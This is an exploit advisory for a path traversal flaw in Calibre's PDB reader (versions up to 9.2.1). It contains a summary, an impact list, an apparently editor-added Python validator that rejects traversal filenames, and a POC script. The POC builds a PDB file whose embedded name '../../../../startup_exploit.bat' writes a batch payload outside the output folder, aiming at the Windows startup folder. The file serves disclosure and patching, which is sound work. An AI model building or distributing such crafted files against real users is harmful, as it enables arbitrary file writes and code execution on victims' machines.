=============================================================================================================================================
| # Title : Calibre ≤ 9.2.1 PDB File Path Traversal Vulnerability Leading to Arbitrary File Write |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://manual.calibre-ebook.com/fr/tutorials.html |
=============================================================================================================================================
[+] Summary : Calibre is a cross-platform e-book management application used for viewing, converting, editing, and organizing digital books.
Versions 9.2.1 and below are vulnerable to a Path Traversal flaw in the PDB file parser, affecting both the 132-byte and 202-byte header variants of the PDB reader implementation.
The vulnerability allows a specially crafted PDB file to embed directory traversal sequences (such as ../) within internal filename fields. When processed by the application, these filenames are not properly sanitized before being written to disk.
[+] As a result, an attacker can:
Write arbitrary files anywhere the user has write permissions
Use arbitrary file extensions
Control the full file content
Silently overwrite existing files (files are written in wb mode)
[+] Impact :
This issue may lead to:
Arbitrary File Write
Local Code Execution (depending on file placement and execution context)
Denial of Service (DoS) through corruption of critical user files
Overwriting configuration, startup, or application data files
The vulnerability has been addressed and fixed in version 9.3.0.
Users are strongly advised to upgrade to version 9.3.0 or later to mitigate the issue.
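The sanitization step the summary describes as missing, as an added example written for this page (not Calibre's code and not the author's POC): every filename read from a PDB record is resolved against the output directory and refused if it is absolute, contains a '..' component, or resolves outside that directory, before anything is opened in wb mode. The function names and the sample record names are this example's own; the '../../../../startup_exploit.bat' entry is the path used in the advisory's POC.

```python
import os


def safe_output_path(output_dir: str, embedded_name: str) -> str:
    """Resolve a filename read from an untrusted PDB record against output_dir.

    Returns the absolute destination path, or raises ValueError when the name
    is absolute, contains a '..' component, or would resolve outside output_dir.
    """
    # Names come from fixed-width, NUL-padded fields: keep only the bytes before the first NUL
    name = embedded_name.split("\x00", 1)[0]
    # Treat backslashes as separators too, so '..\\' is caught as well as '../'
    name = name.replace("\\", "/")
    if name.startswith("/") or (len(name) > 1 and name[1] == ":"):
        raise ValueError(f"absolute path in record name: {embedded_name!r}")
    # Drop empty and '.' components; refuse '..' outright instead of trying to strip it
    parts = [p for p in name.split("/") if p not in ("", ".")]
    if not parts:
        raise ValueError(f"empty record name: {embedded_name!r}")
    if ".." in parts:
        raise ValueError(f"traversal sequence in record name: {embedded_name!r}")
    base = os.path.realpath(output_dir)
    dest = os.path.realpath(os.path.join(base, *parts))
    # Final containment check on the resolved path (also catches a symlink inside
    # the output directory that points elsewhere)
    if os.path.commonpath([base, dest]) != base:
        raise ValueError(f"record name escapes output directory: {embedded_name!r}")
    return dest


def check_record_names(output_dir: str, names: list[str]) -> dict[str, bool]:
    """Map each candidate record name to True (accepted) or False (rejected)."""
    result = {}
    for n in names:
        try:
            safe_output_path(output_dir, n)
            result[n] = True
        except ValueError:
            result[n] = False
    return result


# Constructed sample names: the '../../../../startup_exploit.bat' entry is the path
# from the advisory's POC; the others are further shapes a parser must refuse or accept.
SAMPLE_NAMES = [
    "cover.jpg",
    "images/page1.png",
    "../../../../startup_exploit.bat",
    "..\\..\\startup_exploit.bat",
    "C:/Windows/startup_exploit.bat",
    "/tmp/startup_exploit.bat",
    "./",
]

if __name__ == "__main__":
    for name, ok in check_record_names("calibre_output", SAMPLE_NAMES).items():
        print(f"{'accept' if ok else 'REJECT':6}  {name!r}")
```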
[+] POC :
import struct
import os

def generate_exploit_pdb(filename="exploit.pdb"):
    payload_code = b'@echo off\r\ncalc.exe\r\n'
    traversal_path = b'../../../../startup_exploit.bat'

    # Record whose filename field carries the traversal sequence (layout as in the original POC)
    image_record = bytearray()
    image_record += b'\x00' * 4
    image_record += traversal_path.ljust(32, b'\x00')  # 32-byte, NUL-padded filename field
    image_record += b'\x00' * 26
    image_record += payload_code                       # content the parser writes to that path

    # 132-byte header variant; field values as set by the original POC
    header = bytearray(132)
    struct.pack_into('>H', header, 0, 2)
    struct.pack_into('>H', header, 12, 2)
    struct.pack_into('>H', header, 20, 1)

    dummy_text = b'<html><body><h1>Hello World</h1></body></html>'

    with open(filename, 'wb') as f:
        f.write(b'Exploit Book'.ljust(32, b'\x00'))
        f.write(b'\x00' * 46)  # Padding to reach the records area
        f.write(header)
        f.write(dummy_text)
        f.write(image_record)

    print(f"[+] Exploit file created successfully: {filename}")
    print(f"[*] Target path upon conversion: {traversal_path.decode()}")

if __name__ == "__main__":
    generate_exploit_pdb()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================